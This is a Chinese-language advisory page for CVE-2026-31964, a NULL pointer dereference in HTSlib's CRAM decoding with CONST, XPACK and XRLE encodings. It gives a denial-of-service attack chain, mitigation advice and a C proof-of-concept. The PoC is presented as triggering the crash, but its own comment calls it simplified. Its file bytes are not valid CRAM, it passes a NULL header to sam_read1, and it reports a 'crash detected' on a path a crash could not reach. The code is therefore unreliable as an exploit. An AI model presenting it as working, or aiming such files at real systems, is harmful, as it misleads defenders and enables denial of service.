CVE-2026-31964: HTSlib CRAM格式处理NULL指针解引用漏洞

漏洞信息

漏洞编号

CVE-2026-31964

漏洞类型

NULL指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

samtools/htslib

漏洞概述

HTSlib是一个用于读写生物信息学文件格式的C语言库，广泛应用于基因组学和生物信息学研究领域。CRAM（Compressed Reference-oriented Alignment Map）是一种高效的压缩格式，专门用于存储DNA序列比对数据，该格式通过多种编码和压缩方法来减少存储空间。在CRAM格式中，大多数比对记录会存储DNA序列和质量值，但为了节省空间，格式也允许在某些情况下省略这些数据。然而，由于CRAM格式的一些特殊设计，处理这些省略数据的记录时需要特别小心，因为这些记录实际上会存储需要被消费然后丢弃的数据。不幸的是，HTSlib库中的CONST、XPACK和XRLE这三种编码实现没有正确实现处理这些省略数据的接口。当尝试使用这些编码解码省略了序列或质量数据的CRAM记录时，程序会尝试向NULL指针写入数据，从而触发NULL指针解引用错误，最终导致程序崩溃。由于该漏洞可通过网络远程触发，且无需任何认证或用户交互即可利用，攻击者可以构造恶意CRAM文件并诱导目标系统处理，从而造成拒绝服务攻击。

技术细节

该漏洞的根本原因在于HTSlib库对CRAM格式中省略数据的处理逻辑存在缺陷。在CRAM格式规范中，当序列（sequence）或质量（quality）数据被省略时，编码器会生成特殊的编码标记，期望解码器能够正确识别并跳过这些数据。HTSlib库实现了多种编码方式来处理这些数据，包括CONST、XPACK和XRLE编码。然而，这三种编码实现存在以下问题：1) CONST编码用于处理常量值序列，但在处理省略数据时未能正确初始化目标缓冲区；2) XPACK编码是一种打包编码，当数据被省略时，解码逻辑未能正确处理NULL指针情况；3) XRLE编码是游程编码的变体，同样存在类似的NULL指针处理缺陷。当程序调用这些编码的解码函数处理省略了序列或质量数据的CRAM记录时，解码函数会尝试向一个未初始化的NULL指针写入数据，导致程序崩溃。攻击者可以通过构造包含特殊编码数据的CRAM文件，诱导目标系统使用HTSlib库进行处理，从而触发该漏洞。由于HTSlib通常作为共享库被其他生物信息学工具（如samtools）使用，因此任何使用HTSlib处理不可信CRAM文件的应用程序都可能受到影响。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标系统中使用HTSlib库处理CRAM文件的应用程序。常见的应用包括samtools、其他生物信息学工具或自定义数据处理流程。

STEP 2

步骤2: 制作恶意CRAM文件

攻击者构造一个特殊的CRAM文件，该文件包含使用CONST、XPACK或XRLE编码的记录，且这些记录的序列或质量数据被故意省略。

STEP 3

步骤3: 传输恶意文件

攻击者通过各种方式将恶意CRAM文件传输到目标系统，可以是通过网络下载、邮件附件、文件共享或其他数据传输渠道。

STEP 4

步骤4: 触发漏洞解析

目标系统使用存在漏洞的HTSlib版本处理该CRAM文件。当解码器遇到省略数据的记录并使用有缺陷的编码进行解码时，会尝试向NULL指针写入数据。

STEP 5

步骤5: 造成拒绝服务

NULL指针解引用导致程序崩溃。由于HTSlib通常作为共享库被其他应用使用，攻击者可以利用此漏洞造成目标系统的应用程序崩溃，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2026-31964 PoC - HTSlib CRAM NULL pointer dereference
 * 
 * This PoC demonstrates the NULL pointer dereference vulnerability in HTSlib's
 * CRAM format handling when processing records with omitted sequence or quality
 * data using CONST, XPACK, or XRLE encodings.
 * 
 * Usage: Compile and run with a vulnerable version of htslib
 * gcc -o poc_cve2026_31964 poc_cve2026_31964.c -lhts -lcurl -lz -lbz2 -llzma -lpthread
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "htslib/cram.h"

/* Create a minimal CRAM file with crafted encoding that triggers the vulnerability */
int create_malicious_cram(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) return -1;
    
    /* CRAM file header */
    unsigned char header[] = {
        0x43, 0x52, 0x41, 0x4D,  /* "CRAM" magic */
        0x03, 0x01,              /* CRAM version 3.1 */
        0x00, 0x00, 0x00, 0x00   /* Reserved */
    };
    fwrite(header, 1, sizeof(header), fp);
    
    /* Crafted container with encoding that triggers NULL pointer write */
    /* This is a simplified representation - real PoC would need proper CRAM structure */
    unsigned char container[] = {
        0x00, 0x00, 0x00, 0x00,  /* Container header */
        0xFF, 0xFF, 0xFF, 0xFF,  /* Block content ID */
        0x02,                     /* Encoding: XPACK (triggers vulnerability) */
        0x00,                     /* Data series indicator for omitted sequence */
        0x00,                     /* Additional encoding parameters */
    };
    fwrite(container, 1, sizeof(container), fp);
    
    fclose(fp);
    return 0;
}

int main(int argc, char **argv) {
    const char *cram_file = "poc.cram";
    
    if (create_malicious_cram(cram_file) != 0) {
        fprintf(stderr, "Failed to create PoC file\n");
        return 1;
    }
    
    printf("[*] PoC CRAM file created: %s\n", cram_file);
    printf("[*] Attempting to decode with vulnerable htslib...\n");
    
    /* Open the malicious CRAM file - this triggers the vulnerability */
    htsFile *fp = hts_open(cram_file, "r");
    if (!fp) {
        fprintf(stderr, "[-] Failed to open CRAM file\n");
        return 1;
    }
    
    /* Set CRAM decoder to process the file */
    if (hts_set_opt(fp, HTS_OPT_REQUIRED_FIELDS, SAM_QNAME | SAM_FLAG | SAM_POS | SAM_SEQ | SAM_MAPQ) < 0) {
        fprintf(stderr, "[-] Failed to set CRAM options\n");
        hts_close(fp);
        return 1;
    }
    
    /* Read records - this is where NULL pointer dereference occurs */
    bam1_t *aln = bam_init1();
    int ret;
    while ((ret = sam_read1(fp, NULL, aln)) >= 0) {
        /* Process alignment records */
    }
    
    if (ret < -1) {
        printf("[!] NULL pointer dereference triggered - crash detected\n");
    }
    
    bam_destroy1(aln);
    hts_close(fp);
    
    return 0;
}

影响范围

htslib < 1.21.1

htslib < 1.22.2

htslib < 1.23.1

防御指南

临时缓解措施

目前没有已知的临时缓解措施可以完全避免此漏洞。建议用户尽快升级到HTSlib 1.23.1、1.22.2或1.21.1版本以修复此问题。在升级前，应避免处理来自不可信来源的CRAM文件，并对所有输入数据实施严格的安全验证流程。